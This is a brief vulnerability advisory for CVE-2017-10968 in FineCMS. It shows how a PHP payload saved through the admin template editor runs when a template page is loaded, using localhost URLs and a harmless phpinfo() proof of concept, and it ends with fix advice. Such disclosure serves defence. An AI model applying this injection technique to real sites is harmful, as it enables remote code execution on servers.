andrzuk/FineCMS before 2017-07-06 is vulnerable to a code exec in web page

CVE-ID:CVE-2017-10968

#Bug info

There is a code exec vulnerable in Finecms adminpage when user input

<?php phpinfo(); ?>

The vulnerable in code application\core\controller\template.php

the code exec vulnerable in http://localhost/templates/pages/default.php page

Step 1

http://localhost/index.php?route=admin

http://localhost/index.php?route=template

save.

Step 2


http://localhost/templates/pages/default.php

Fix bug

1.Turn off this feature; 2.Verify input.